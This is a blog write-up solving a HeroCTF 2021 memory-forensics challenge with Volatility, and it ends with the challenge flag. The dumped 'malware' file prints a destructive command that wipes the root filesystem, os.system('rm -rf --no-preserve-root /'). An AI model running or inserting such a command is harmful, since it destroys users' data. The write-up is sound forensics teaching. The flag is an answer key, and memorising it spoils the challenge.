HeroCTF v3 2021: We need you 4/5 | szymanski.ninja

We need you 4/5

Category: Forensics

chal

80 points

The FBI and Interpol are desperately looking for the first and last names of the two hackers.

Moreover, we know that they were developing a malware, find its name and version too !

Find this valuable information!

Author: Worty
Format: Hero{Lastname-Firstname:Lastname-Firstname:NAME-X.X.X}

Solution

This is continuation of We need you 3/5 challenge.

By scanning the memory for file I’ve found one file with suspicious name.

~/git/volatility3/vol.py -f capture.mem windows.filescan | grep py
0x7dc30518 100.0\Users\Razex\Documents\Malw4r3\Nemesis.py.txt.py.txt    128

Dumped the file to take a look into.

~/git/volatility3/vol.py -f capture.mem windows.dumpfiles --physaddr 0x7dc30518
Volatility 3 Framework 1.0.1
Progress:  100.00		PDB scanning finished                     
Cache	FileObject	FileName	Result

DataSectionObject	0x7dc30518	Nemesis.py.txt.py.txt	file.0x7dc30518.0x871acee8.DataSectionObject.Nemesis.py.txt.py.txt.dat

cat file.0x7dc30518.0x871acee8.DataSectionObject.Nemesis.py.txt.py.txt.dat 
#Author : PAVOLI Ruben
#Version: 4.5.1
import os
os.system("rm -rf --no-preserve-root /")
def encrypt():
    with open("rsa_gen.key","rb"):
        ################################################
        #            MALWARE PUSH ON GIT                #
        ################################################

Ok, so we got everything except the second hacker’s first and last name. I had to use Volatility 2 for this purpose.

python2 ~/git/volatility/vol.py -f capture.mem imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/luc/storage/tmp/capture.mem)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82780c28L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82781c00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2021-04-19 17:30:00 UTC+0000
     Image local date and time : 2021-04-19 19:30:00 +0200

python2 ~/git/volatility/vol.py -f capture.mem --profile=Win7SP1x86_23418 clipboard
Volatility Foundation Volatility Framework 2.6.1
Session    WindowStation Format                 Handle Object     Data                                              
---------- ------------- ------------------ ---------- ---------- --------------------------------------------------
         1 WinSta0       CF_UNICODETEXT       0x2a0163 0xffa007f8 GOLDEN Dany                                       
         1 WinSta0       CF_LOCALE            0x1c01fb 0xfe493690                                                   
         1 WinSta0       CF_TEXT                   0x1 ----------                                                   
         1 WinSta0       CF_OEMTEXT                0x1 ----------

Gotcha!

Flag

Hero{PAVOLI-Ruben:GOLDEN-Dany:Nemesis-4.5.1}